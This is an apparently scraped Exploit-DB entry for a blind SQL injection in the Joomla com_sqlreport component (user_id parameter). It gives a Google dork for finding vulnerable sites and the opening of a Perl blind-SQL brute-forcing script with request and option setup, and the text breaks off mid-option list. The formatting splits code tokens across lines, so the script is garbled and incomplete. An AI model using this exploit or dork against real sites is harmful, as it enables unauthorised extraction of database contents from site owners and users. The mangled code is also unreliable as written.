Joomla user_ID com_sqlreport組件的SQL註盲漏洞

# Title: Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability

# EDB-ID: 11549

# CVE-ID: ()

# OSVDB-ID: ()

# Author: Snakespc

# Published: 2010-02-23

# Verified: no

# DownloadExploit Code

# Download N/A

view source

print?

==============================================================================

[»]Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability

==============================================================================

     

 

[»] Script:   [Joomla]

[»] Language: [ PHP ]

[»] Founder:  [ Snakespc Email:super_cristal

@hotmail

.com - Site:sec-war.com/cc> ]

[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]

[»] Dork:inurl:

"com_sqlreport"

 

[»] 

###########################################################################

 

===[ Exploit ]===POC Blind Joomla (user_id) com_sqlreport >>>>Note::Placés dans un dossier C:\Perl\bin\snakespc.pl

###########################################################################

#!/usr/bin/perl

use

LWP::UserAgent;

 

 

use

Getopt::Long;

 

 

use

IO::Handle;

 

 

use

strict;

 

 

$| = 1;

 

 

 

 

 

 

 

 

###############################################################################

 

 

my

$default_debug

= 0;

 

 

my

$default_length

= 32;

 

 

my

$default_method

=

"GET"

;

 

 

my

$default_time

= 0;

 

 

my

$version

=

"1.1"

;

 

 

my

$default_useragent

=

"bsqlbf $version"

;

 

 

my

$default_dict

=

"dict.txt"

;

 

 

my

$default_sql

=

"version()"

;

 

 

###############################################################################

 

 

 

 

 

 

$| = 1;

 

 

 

 

my

(

$args

,

$abc

,

$solution

);

 

 

my

(

$string

,

$char

,

@dic

);

 

 

my

(

%vars

,

@varsb

);

 

 

my

(

$lastvar

,

$lastval

);

 

 

my

(

$scheme

,

$authority

,

$path

,

$query

,

$fragment

);

 

 

my

$hits

= 0;

 

 

my

$usedict

= 0; 

my

$amatch

= 0;

 

 

my

(

$ua

,

$req

);

 

 

 

 

###############################################################################

# 

#Define GetOpt:

 

 

my

(

$url

,

$sql

,

$time

,

$rtime

,

$match

,

$uagent

,

$charset

,

$debug

);

 

 

my

(

$proxy

,

$proxy_user

,

$proxy_pass

,

$rproxy

,

$ruagent

);

 

 

my

(

$dict

,

$start

,

$length

,

$method

,

$cookie

,

$blind

);

 

 

my

(

$help

,

$bincharset

,

$get

,

$nodict

);

 

 

 

 

my

$options

= GetOptions (

 

 

  

'help!'

           

=> \

$help

,

 

 

  

'url=s'

           

=> \

$url

,

  

 

  

'get=s'

           

=> \

$get

,

 

 

  

'sql=s'

           

=> \

$sql

,

 <